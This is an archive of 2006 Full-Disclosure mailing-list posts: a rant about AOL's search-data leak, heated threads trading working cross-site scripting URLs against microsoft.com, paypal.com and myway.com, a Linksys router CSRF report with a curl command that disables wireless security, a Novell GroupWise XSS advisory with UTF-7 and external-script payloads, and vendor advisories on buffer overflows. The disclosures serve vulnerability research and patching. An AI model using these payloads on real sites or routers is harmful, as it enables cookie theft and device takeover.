[Full-disclosure] Re: AOL data being mirrored everywhere
Are you n3td3v?? Why all the [EMAIL PROTECTED]@?? he could sue you.Date: Mon, 07 Aug 2006 10:49:20 -0700 From: kaiser scapegoat [EMAIL PROTECTED] Hi, all -AOL released data for 500,000 out in the wild for 500,000:http://tinyurl.com/ky6ekSince it has been widely mirrored, AOL will next find a scapegoat so the public will be more worried about those villains that dared to point out theproblem and mirror the evidence.Here is the instant recipe:1) PR department reaches out to their media contacts. Journalists then tell sensationalist story of hackers or bloggers who mirrored *your* privatedata. AOL worms out of responsibility for letting the data loose in thefirst place by declaring war on the evil bloggers. 2) Now that there's no public support for the blogger, AOL can safely tricka government agency into publicly denouncing the blogger. Since the bloggeris clearly a danger to public safety, the government is allowed to ignore all applicable law. After all their heart was in the right place, and thatmatter's more than an individual's rights. Also, since the press is alreadycommitted to portraying the blogger as a villain, the government knows that they will never have to apologize if they make a mistake. The press has avested interest not to report the error.3) Next AOL's team of corporate lawyers will file a lawsuit. It doesn'tmatter if the lawsuit is frivolous - they are after the PR value of prosecuting on behalf of the public, and reinforcing to the media that theblogger who dared link to the info is the evil one. If the blogger is poor,weak, and has no media platform of their own, then AOL might actually win the lawsuit by default, adding further legitimacy to their public defenderposture.4) The public doesn't understand that killing the messenger only guaranteessuccessful cover ups in the future. And as far as I can tell, they don't care that there is a layer of people who corporations can calculate ashaving no Constitutional rights in this country (if a person can't defendtheir rights, they might as well not exist). AOL's issues management team is weaving these assumptions into their strategy.Scapegoating worked for Kaiser Permanente. It'll work for AOL. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: micosoft.com xss
On 08/08/06, Mad World [EMAIL PROTECTED] wrote: Why do you need it ?You already discovered xss, the rest of job is just matter of technique.I think majority of xss submitters here could do it by various means.M$ is lost in its own complexity of how to do simple things. If you could ever give me reasonable answer for why do you need this $hit - I could give you the rest, like others could.I doubt you actually tried getting js executed on page load (for some reason they try to prevent xss in a number of ways). I did try and didn't succeed, that's why I ask.Greets,Thomas ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] microsoft.com xss #2
Hello,for what it's worth.. http://forums.microsoft.com/MSDN/Search/Search.aspx?words=mslocalechoice=9SiteID=1searchscope='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EForumID=45Greets,Thomas ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] mysearch.myway.com XSS
HAI GAIS!http://mysearch.myway.com/jsp/GGmain.jsp?searchfor=%3Cimg%20src%3D%22http%3A//0xdeadface.co.uk/richard.jpg%22/%3E Hugs Kisses dyn0/codeslag ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: micosoft.com xss
Good morning ! You can doubt, it's your right to do so. Wanna bet ? Just open your eyes and your nose will show you that you are actually braking silly structure of page in more than one place .. I's relatively easy using the same exact place of code you tried to make it. I have working example, it is based on other microsoft features as well. Greets, - Mad World --- [EMAIL PROTECTED] wrote: From: Thomas Pollet [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: micosoft.com xss Date: Tue, 8 Aug 2006 10:18:56 +0200 On 08/08/06, Mad World [EMAIL PROTECTED] wrote: Why do you need it ? You already discovered xss, the rest of job is just matter of technique. I think majority of xss submitters here could do it by various means. M$ is lost in its own complexity of how to do simple things. If you could ever give me reasonable answer for why do you need this $hit - I could give you the rest, like others could. I doubt you actually tried getting js executed on page load (for some reason they try to prevent xss in a number of ways). I did try and didn't succeed, that's why I ask. Greets, Thomas _ Visit Thailand @ http://www.sawadee.com Websearch and email: DNSASIA.com FAST! 128k dialup: login.samuinet.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Attacking the local LAN via XSS
On 8/7/06, Nikolay Kubarelov [EMAIL PROTECTED] wrote: On Friday 04 August 2006 16:06, pdp (architect) wrote: IMHO, if you want to do stuff on lower level, you need to think of something else. JavaScript, Flash and Java Applets are technologies that are designed to run on the WEB. This is why, IMHO, they are quite good platform for performing WEB/HTTP based attacks. OK, I'm really interested what are those login web pages with default password for admin:password I see all my network. I bet there are more than 10% routers with open http ports. I can attach snapshots if you buy me a beer. The question is what where is the xss bug on major http admin panel's. Does this count? From an earlier post by GinsuRabbit: I. DESCRIPTION Tested product: Linksys WRT54g home router, firmware revision 1.00.9. Problem #1: No password validation for configuration settings. The WRT54g does not attempt to verify a username and password when configuration settings are being changed. If you wish to read configuration settings, you must provide the administrator ID and password via HTTP basic authentication. No similar check is done for configuration changes. This request results in a user-id and password prompt: GET /wireless.htm This request disables wireless security on the router, with no password prompt: POST /Security.tri Content-Length: 24 SecurityMode=0layout=en Problem #2: Cross-site request forgery The web administration console does not verify that the request to change the router configuration is being made with the consent of the administrator. Any web site can force a browser to send a request to the linksys router, and the router will accept the request. II. Exploitation The combination of these two bugs means that any internet web site can change the configuration of your router. Recently published techniques for port-scanning and web server finger printing via java and javascript make this even easier. The attack scenario is as follows: - intranet user visits a malicious web site - malicious web site returns specially crafted HTML page - intranet user's browser automatically sends a request to the router that enables the remote administration interface - the owner of the malicious web site now has complete access to your router I'm not going to share the specially crafted HTML page at this time, but it isn't all that special. III. DETECTION If your router is vulnerable, the following curl command will disable wireless security on your router. Tests for other router models and firmware revisions may be different: curl -d SecurityMode=0layout=en http://192.168.0.1/Security.tri IV. MITIGATION 1) Make sure you've disabled the remote administration feature of your router. If you have this feature enabled, anybody on the internet can take control of the router. 2) Change the IP address of the router to a random value, preferably in the range assigned to private networks. For example, change the IP address to 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive. This makes it more difficult for an attacker to forge the request necessary to change the router configuration. This mitigation technique might not help much if you have a java-enabled browser, because of recently published techniques for determining gateway addresses via java applets. 3) Disable HTTP access to the administration interface of the router, allowing only HTTPS access. Under most circumstances, this will cause the browser to show a certificate warning before the configuration is changed. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] paypal.com xss (was Re: micosoft.com xss)
Man you suck, codes or stfu.I know the code is broken in more than 1 place, i tried registering event handlers, exiting jscript etc. etc. time to move onpoint is xss is everywhere, trust noone etc. etc. To make my point clear... last of the [EMAIL PROTECTED]GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */* Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);var%20f= results inscript type=text/_javascript_!--/* SiteCatalyst Variables */s.pageName=SignUp:Landing Page;s.prop11=general/SignupInitial.xsl::_registration-run::0; s.channel=Sign Up:Landing Page;s.r=https://www.paypal.com/cgi-bin/webscr?cmd=_help-extamp;source_page=_profile-comparison ;alert(xss);var%20f=;s.prop7=Unknown;s.prop8=Unknown;s.prop9=Unknown;s.prop10=US;s.prop12=Unknown;s.visitorSampling= 20;/* DO NOT ALTER ANYTHING BELOW THIS LINE ! **/var s_code=s.t();if(s_code)document.write(s_code) // --/scriptin other words referer url isn't correctly cleaned for paypal registration page and used for js var. poc: go tohttps://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);s.r= and click on the sign up linkHave a nice life, die soon,ThomasOn 08/08/06, Mad World [EMAIL PROTECTED] wrote: Good morning !You can doubt, it's your right to do so.Wanna bet ?Just open your eyes and your nose will show you that you are actually braking silly structure of page in more than one place .. I's relatively easy using the same exact place of code you tried to make it.I have working example, it is based on other microsoft features as well.Greets,- Mad World--- [EMAIL PROTECTED] wrote:From: Thomas Pollet [EMAIL PROTECTED]To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.ukSubject: Re: [Full-disclosure] Re: micosoft.com xssDate: Tue, 8 Aug 2006 10:18:56 +0200 On 08/08/06, Mad World [EMAIL PROTECTED] wrote:Why do you need it ?You already discovered xss, the rest of job is just matterof technique. Ithinkmajorityofxsssubmittershere could do it byvarious means.M$ is lost in its own complexity of how to do simple things.Ifyoucould ever give me reasonable answer for why do you needthis$hit- I could give you the rest, like otherscould.Idoubtyouactuallytried getting js executed on page load(for some reason they try to prevent xss in a number of ways). I did try and didn't succeed, that's why I ask.Greets,Thomas_Visit Thailand @ http://www.sawadee.com Websearch and email: DNSASIA.com FAST!128k dialup: login.samuinet.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: micosoft.com xss
For such a words you could eat your hat if I would like to go in public. It's a last time i am teaching script kiddies for something beond their understanding. I would like that you have at least small area in your brains that restricts your tong. If you wouldn't be script kiddie you would take your words back and learn instead. Yesterdays code is here: http://support.microsoft.com/newsgroups/default.aspx?lang=encr=USdg=microsoft.public.ccfsloc=us%27%29%22%20st%79le%3d%22co%6cor%3aex%70ress%69on%28ale%72t%28String.fromCharCode%280x004d%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x0063%29%2bString.fromCharCode%280x0072%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x002c%29%2bString.fromCharCode%280x0073%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0066%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x003a%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x006d%29%2bString.fromCharCode%280x0070%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0065%29%2bString.fromCharCode%280x006e%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0021%29%29%29%22%20a%3d%22%5c%22%29 Learn,learn,learn (of course if you will have enaugh skills to handle your browser after that). Greets, Mad World. --- [EMAIL PROTECTED] wrote: Man you suck, codes or stfu. I know the code is broken in more than 1 place, i tried registering event handlers, exiting jscript etc. etc. time to move on point is xss is everywhere, trust noone etc. etc. To make my point clear... last of the [EMAIL PROTECTED] GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */* Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);var%20f= results in script type=text/javascript !-- /* SiteCatalyst Variables */ s.pageName=SignUp:Landing Page; s.prop11=general/SignupInitial.xsl::_registration-run::0; s.channel=Sign Up:Landing Page; s.r=https://www.paypal.com/cgi-bin/webscr?cmd=_help-extamp;source_page=_profile-comparison ;alert(xss);var%20f=; s.prop7=Unknown; s.prop8=Unknown; s.prop9=Unknown; s.prop10=US; s.prop12=Unknown; s.visitorSampling= 20; /* DO NOT ALTER ANYTHING BELOW THIS LINE ! **/ var s_code=s.t();if(s_code)document.write(s_code) // -- /script in other words referer url isn't correctly cleaned for paypal registration page and used for js var. poc: go to https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);s.r= and click on the sign up link Have a nice life, die soon, Thomas On 08/08/06, Mad World [EMAIL PROTECTED] wrote: Good morning ! You can doubt, it's your right to do so. Wanna bet ? Just open your eyes and your nose will show you that you are actually braking silly structure of page in more than one place .. I's relatively easy using the same exact place of code you tried to make it. I have working example, it is based on other microsoft features as well. Greets, - Mad World --- [EMAIL PROTECTED] wrote: From: Thomas Pollet [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: micosoft.com xss Date: Tue, 8 Aug 2006 10:18:56 +0200 On 08/08/06, Mad World [EMAIL PROTECTED] wrote: Why do you need it ? You already discovered xss, the rest of job is just matter of technique. I think majority of xss submitters here could do it by various means. M$ is lost in its own complexity of how to do simple things. If you could ever give me reasonable answer for why do you need this $hit - I could give you the rest, like others could. I doubt you actually tried getting js executed on page load (for some reason they try to prevent xss in a number of ways). I did try and didn't succeed, that's why I ask. Greets, Thomas _ Visit Thailand @ http://www.sawadee.com Websearch and email: DNSASIA.com FAST! 128k dialup: login.samuinet.com --- [EMAIL PROTECTED] wrote: From: Thomas Pollet [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: micosoft.com xss Date: Tue, 8 Aug 2006 10:18:56 +0200 On 08/08/06, Mad World [EMAIL PROTECTED] wrote: Why do you need it ? You already discovered xss, the rest of job is just matter of technique. I think majority of xss submitters here could do it by various means. M$ is lost in its own complexity of how to do simple things. If you could ever give me reasonable answer for why do you need this $hit - I
[Full-disclosure] TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities
TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities http://www.tippingpoint.com/security/advisories/TSRT-06-07.html August 8, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: Enterprise Security Analyzer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 31, 2006 by Digital Vaccine protection filter ID 4386. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit these vulnerabilities. The first flaw specifically exists within the routines responsible for handling user-supplied data on TCP port within Monitoring.exe. Upon connecting to this port the user is immediately prompted for a password. A custom string comparison loop is used to validate the supplied password against the hard-coded value eiq2esa?, where the question mark represents any alpha-numeric character. Issuing the command HELP reveals a number of documented commands: - Usage: QUERYMONITOR: to fetch events for a particular monitor QUERYMONITORusermonidtimer QUERYEVENTCOUNT or QEC: to get latest event counts RESETEVENTCOUNT or REC: to reset event counts REC[ALL] or RECdev1,dev2, STATUS: Display the running status of all the threads TRACE: TRACEip or hostname. TRACEOFF will turn off the trace FLUSH: reset monitors as though the hour has changed ALRT-OFF and ALRT-ON: toggle the life of alerts-thread. RECV-OFF and RECV-ON: toggle the life of event-collection thread. EM-OFF and EM-ON toggle event manager DMON-OFF and DMON-ON toggle device event monitoring HMON-OFF and HMON-ON toggle host event monitoring NFMON-OFF and NFMON-ON toggle netflow event monitoring HPMON-OFF and HPMON-ON toggle host perf monitoring X or EXIT: to close the session - Supplying a long string to the TRACE command results in an overflow of the global variable at 0x004B1788. A neighboring global variable, 116 bytes after the overflowed variable, contains a file output stream pointer that is written to every 30 seconds by a garbage collection thread. The log message can be influenced and therefore this is a valid exploit vector, albeit complicated. A trivial exploit vector exists within the parsing of the actual command at the following equivalent API call: sscanf(socket_data, %[^]%[^], 60_byte_stack_var, global_var); Because no explicit check is made for the exact command TRACE, an attacker can abuse this call to sscanf by passing a long suffix to the TRACE command that is free of the field terminating character, ''. This vector is trivial to exploit. The second flaw specifically exists within the routines responsible for handling user-supplied data on TCP port 10626 within Monitoring.exe. The service will accept up to approximately 16K of data from unauthenticated clients which is later parsed, in a similar fashion to above, in search of the delimiting character ''. Various trivial vectors of exploitation exist, for example, through the QUERYMONITOR command. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.31 - Digital Vaccine released to TippingPoint customers 2006.08.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Pedram Amini, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-06-026: Microsoft Internet Explorer Multiple CSS Imports Memory Corruption Vulnerability
ZDI-06-026: Microsoft Internet Explorer Multiple CSS Imports Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-026.html August 8, 2006 -- CVE ID: CVE-2006-3451 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 All Versions Internet Explorer 5 SP4 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since August 8, 2006 by Digital Vaccine protection filter ID 4606. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists due to improper garbage collection when multiple imports are used on a styleSheets collection. Crafting a long chain of CSS imports in an HTML document results in a memory corruption eventually leading to code execution. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS06-042.mspx -- Disclosure Timeline: 2006.06.14 - Vulnerability reported to vendor 2006.08.08 - Digital Vaccine released to TippingPoint customers 2006.08.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Sam Thomas. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ERRATA: [ GLSA 200608-08 ] GnuPG: Integer overflow vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE]GLSA 200608-08:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: GnuPG: Integer overflow vulnerability Date: August 05, 2006 Updated: August 08, 2006 Bugs: #142248 ID: 200608-08:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata == The Resolution proposed in the original version of this Security Advisory did not correctly address the issue for users who also have GnuPG 1.9 installed. The corrected sections appear below. Resolution == All GnuPG users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-crypt/gnupg-1.4* References == [ 1 ] CVE-2006-3746 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3746 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200608-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpJySKs9k4QD.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TSRT-06-08: Microsoft Internet Help COM Object Memory Corruption Vulnerability
TSRT-06-08: Microsoft Internet Help COM Object Memory Corruption Vulnerability http://www.tippingpoint.com/security/advisories/TSRT-06-08.html August 8, 2006 -- CVE ID: CVE-2006-3357 -- Affected Vendor: Microsoft -- Affected Products: Microsoft Windows Server 2003 SP1 and SP2 Microsoft Windows XP SP1 and SP2 Microsoft Windows 2000 Service Pack 4 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since August 8, 2006 by Digital Vaccine protection filter ID 4581. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific vulnerability can lead to code execution when instantiating the Internet.HHCtrl COM object through Internet Explorer. The flaw exists due to invalid freeing of heap memory when several calls to the Image property of the ActiveX control are performed. By abusing the jscript.dll CScriptBody::Release() function user supplied data can be executed. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS06-046.mspx -- Disclosure Timeline: 2006.04.27 - Vulnerability reported to vendor 2006.08.08 - Digital Vaccine released to TippingPoint customers 2006.08.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TSRT-06-09: Microsoft DirectAnimation COM Object Memory Corruption Vulnerability
TSRT-06-09: Microsoft DirectAnimation COM Object Memory Corruption Vulnerability http://www.tippingpoint.com/security/advisories/TSRT-06-09.html August 8, 2006 -- CVE ID: CVE-2006-3638 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 All Versions Internet Explorer 5 SP4 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since August 8, 2006 by Digital Vaccine protection filter ID 4593. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the DirectAnimation.DATuple ActiveX control when improperly calling the Nth() method. By supplying a positive integer we can control a data reference calculation that is later used to control execution. The problem is due to the lack of sanity checking on the index used during a call to TupleNthBvrImpl::GetTypeInfo() in danim.dll. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS06-042.mspx -- Disclosure Timeline: 2006.04.27 - Vulnerability reported to vendor 2006.08.08 - Digital Vaccine released to TippingPoint customers 2006.08.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, Tipping Point Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TSRT-06-10: Microsoft HLINK.DLL Hyperlink Object Library Buffer Overflow Vulnerability
TSRT-06-10: Microsoft HLINK.DLL Hyperlink Object Library Buffer Overflow Vulnerability http://www.tippingpoint.com/security/advisories/TSRT-06-10.html August 8, 2006 -- CVE ID: CVE-2006-3086 -- Affected Vendor: Microsoft -- Affected Products: Microsoft Windows Server 2003 SP1 and SP2 Microsoft Windows XP SP1 and SP2 Microsoft Windows 2000 Service Pack 4 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since August 8, 2006 by Digital Vaccine protection filter ID 4601. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable applications that utilize Microsoft Hyperlink Component Object Model (COM) objects. Specifically, this includes at least Microsoft Word, PowerPoint and Excel. Exploitation over the web is doable via Office Web Components (OWC). It is not required for the target to have OWC installed. The specific flaw exists within HLINK.DLL in the routine HrShellOpenWithMonikerDisplayName(). The vulnerability is due to an unchecked WzCopy (wide char string copy) to a stack based buffer from user-supplied data in the following call chain: HLNK_Bsc::OnObjectAvailable HLNK::HrCompleteNavigation() HLNK::HrShowTarget() HrShellOpenWithMonikerDisplayName() The specific WzCopy() responsible for the overflow is shown in the following disassembly snippet from HLINK.DLL version 5.2.3790.227 from Windows XP SP2: 7682DA6B lea eax, [ebp+overflowed_buffer] ; dst 7682DA71 push eax 7682DA72 push [ebp+var_E30] ; src 7682DA78 call WzCopy(ushort const *,ushort *) ; vulnerable call The overflowed buffer is at frame pointer offset 0x0E2C, requiring a 3,628 byte write before breaking out of the holding stack frame. Simply specifying a long URI string will not trigger the vulnerability. However, by requesting a URI that does a redirect with the HTTP Location: tag to a long URI, then the vulnerable code will be reached and a previous call to HrGetFullDisplayName() will pass the long URI to the vulnerable WzCopy(). The long URI must actually exist, otherwise the URI expansion will fail and the WzCopy() will never be reached. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS06-050.mspx -- Disclosure Timeline: 2006.02.28 - Vulnerability reported to vendor 2006.08.08 - Digital Vaccine released to TippingPoint customers 2006.08.08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Pedram Amini, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Much Ado Over Whether Lieberman Campaign Site Was Hacked
MSNBC has been reporting that the Lieberman campaign site was hacked. There have been numerous theories on this since it was reported yesterday. Thought you all might be interested in the attempt at technical analysis taking place on Daily Kos: http://www.dailykos.com/story/2006/8/8/144119/5628 _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ISR] - Novell Groupwise Webaccess (Cross-Site Scripting)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 :: :: [ISR] :: Infobyte Security Research :: www.infobyte.com.ar :: 08.08.2006 :: .:: SUMMARY Novell Groupwise WebAccess Cross-Site Scripting Version: Novell GroupWise WebAccess 7, 6.5 It is suspected that all previous versions of Groupwise WebAccess are vulnerable. .:: BACKGROUND GroupWise WebAccess is Novell's premier Intranet/Internet GroupWare solution for the Web. More info:http://www.novell.com .:: DESCRIPTION Remote explotation of Cross-Site Scripting due to failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. Example 1: - - - Description: The filter of Groupwise doesn't check UTF-7 encondig. Sending an email with the following html code we can execute javascript code in the context of authenticated user browser. html head META HTTP-EQUIV=CONTENT-TYPE CONTENT=text/html; charset=UTF-7 /head +ADw-SCRIPT+AD4-alert(document.cookie);+ADw-/SCRIPT+AD4- /html Example 2: - - - Description: The filter of Groupwise doesn't sanitize the following code html SCRIPT/XSS SRC=http://www.infobyte.com.ar/xss/xss.js;/SCRIPT SCRIPT/SCRIPT /html It show a simple codes of examples to execute script in the browser of an unsuspecting user. These issues may allow for the theft of authentication credentials. .:: VENDOR RESPONSE Vendor advisory: http://www.novell.com/support/search.do?cmd=displayKCdocType=kcexternalI d=3701584sliceId=SAL_PublicdialogID=8568328stateId=0 0 8572233 Vendor patch: Hot Patch for GroupWise 7: http://support.novell.com/filefinder/20641/beta.html Field Test File for GroupWise 6.5: http://support.novell.com/filefinder/16963/beta.html .:: CVE INFORMATION Id: CVE-2006-3817 Web: http://cve.mitre.org .:: DISCLOSURE TIMELINE 05/26/2006 Initial vendor notification 05/26/2006 Initial vendor response 07/31/2005 Coordinated public disclosure .:: CREDIT Francisco Amato is credited with discovering this vulnerability. famato][at][infobyte][dot][com][dot][ar .:: ADVISORY http://www.infobyte.com.ar/adv/ISR-14.html .:: LEGAL NOTICES Copyright (c) 2005 by [ISR] Infobyte Security Research. Permission to redistribute this alert electronically is granted as long as it is not edited in any way unless authorized by Infobyte Security Research Response. Reprinting the whole or part of this alert in any medium other than electronically requires permission from infobyte com ar Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. 